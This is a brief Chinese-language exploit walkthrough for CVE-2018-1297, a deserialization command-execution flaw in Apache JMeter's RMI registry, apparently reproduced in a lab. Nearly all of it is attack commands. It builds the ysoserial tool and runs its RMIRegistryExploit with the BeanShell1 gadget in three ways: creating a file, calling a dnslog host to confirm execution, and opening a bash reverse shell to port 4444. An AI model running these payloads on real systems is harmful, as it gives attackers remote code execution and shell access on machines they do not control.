Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
阅读原文时间:2023年07月09日阅读:2

下载ysoserial,git

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial
mvn clean package -DskipTests

cd target/

执行命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'touch /tmp/success'

或者

java
-cp ysoserial-0.0.6-SNAPSHOT-all.jar
ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'curl
8v8oop.dnslog.cn'

或者

java -cp
ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit
192.168.49.2 1099 BeanShell1 'bash -i >&
/dev/tcp/192.168.49.129/4444 0>&1'